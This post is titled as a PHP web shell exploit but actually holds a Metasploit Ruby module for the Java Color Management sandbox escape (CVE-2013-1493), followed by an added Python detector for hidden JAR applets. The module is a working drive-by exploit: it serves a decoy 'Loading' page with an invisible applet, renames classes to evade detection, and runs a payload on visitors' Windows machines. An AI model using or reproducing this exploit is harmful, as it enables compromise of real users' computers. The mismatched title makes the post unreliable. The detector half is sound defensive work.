STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # Load the four precompiled exploit classes shipped under data/exploits/cve-2013-1493
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # The applet entry class is renamed to a random four-letter name (same length as "Init")
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Serve the JAR: payload classes plus the exploit classes loaded in setup
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the static "metasploit"/"Payload" strings in entry names and contents
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Serve the landing page that embeds the applet
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|

    return html
  end

end
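The module above delivers its applet through a landing page whose only visible content is a "Loading" message, while the `<applet>` tag pulls a randomly named JAR at a 1x1 pixel size. The following detector is an added example written for this post; it is not part of the original post and not code from the Metasploit project. It parses an HTTP response body, collects every `<applet>` tag, and scores two independent indicators: the applet loads a `.jar` archive, and it is rendered at one pixel or smaller so the user never sees it. The sample pages embedded in the block are constructed; `abcdefgh.jar` and `Wxyz.class` stand in for the randomised names the module would generate, and `Clock.class` is a made-up benign applet.

```python
# Added example (not from the original post or the Metasploit project):
# flag hidden-applet delivery pages like the one generate_html() above emits.
from dataclasses import dataclass, field
from html.parser import HTMLParser
from typing import List, Optional


@dataclass
class AppletFinding:
    archive: str
    code: str
    width: Optional[int]
    height: Optional[int]
    reasons: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        # JAR delivery plus a hidden rendering size is the pattern worth paging on.
        if len(self.reasons) >= 2:
            return "high"
        return "low" if self.reasons else "info"


class _AppletCollector(HTMLParser):
    """Collects every <applet> start tag with its attributes (keys lower-cased)."""

    def __init__(self) -> None:
        super().__init__()
        self.applets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "applet":
            self.applets.append({k.lower(): (v or "") for k, v in attrs})


def _to_int(value: Optional[str]) -> Optional[int]:
    """Parse width/height values such as '1' or '300px'; None when absent or non-numeric."""
    try:
        return int(value.strip().rstrip("px"))
    except (AttributeError, ValueError):
        return None


def scan_html(body: str) -> List[AppletFinding]:
    """Return one AppletFinding per <applet> in the body with the indicators it matched."""
    collector = _AppletCollector()
    collector.feed(body)
    findings = []
    for attrs in collector.applets:
        archive = attrs.get("archive", "")
        code = attrs.get("code", "")
        width, height = _to_int(attrs.get("width")), _to_int(attrs.get("height"))
        reasons = []
        if archive.lower().endswith(".jar"):
            reasons.append("applet pulls a JAR archive")
        if width is not None and height is not None and width <= 1 and height <= 1:
            reasons.append("applet rendered at <=1x1 pixels (hidden from the user)")
        findings.append(AppletFinding(archive, code, width, height, reasons))
    return findings


def triage(body: str) -> str:
    """Highest severity across all applets on the page; 'none' when the page has no applet."""
    order = {"info": 0, "low": 1, "high": 2}
    findings = scan_html(body)
    if not findings:
        return "none"
    return max((f.severity for f in findings), key=order.__getitem__)


# Constructed sample modelled on the HTML generate_html() produces; the archive
# and class names are placeholders for the randomised values.
SUSPECT_PAGE = (
    '<html><head><title>Loading, Please Wait...</title></head>'
    '<body><center><p>Loading, Please Wait...</p></center>'
    '<applet archive="abcdefgh.jar" code="Wxyz.class" width="1" height="1">'
    '</applet></body></html>'
)

# Constructed benign page: a visible applet that ships its own class and no JAR.
BENIGN_PAGE = (
    '<html><body><applet code="Clock.class" width="300" height="200">'
    '</applet></body></html>'
)

if __name__ == "__main__":
    for name, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        for finding in scan_html(page):
            print(name, finding.severity, finding.archive or "(no archive)",
                  finding.code, finding.reasons)
```

Run this over proxy or sandbox captures of `text/html` responses; a "high" result on a page served from an otherwise empty host is a good trigger to pull the referenced JAR for analysis. The two indicators are deliberately generic: neither the "Loading, Please Wait" decoy nor the eight-letter archive name is relied on, because both are trivially changed, whereas a JAR applet that the user cannot see is suspicious regardless of the specific exploit inside it.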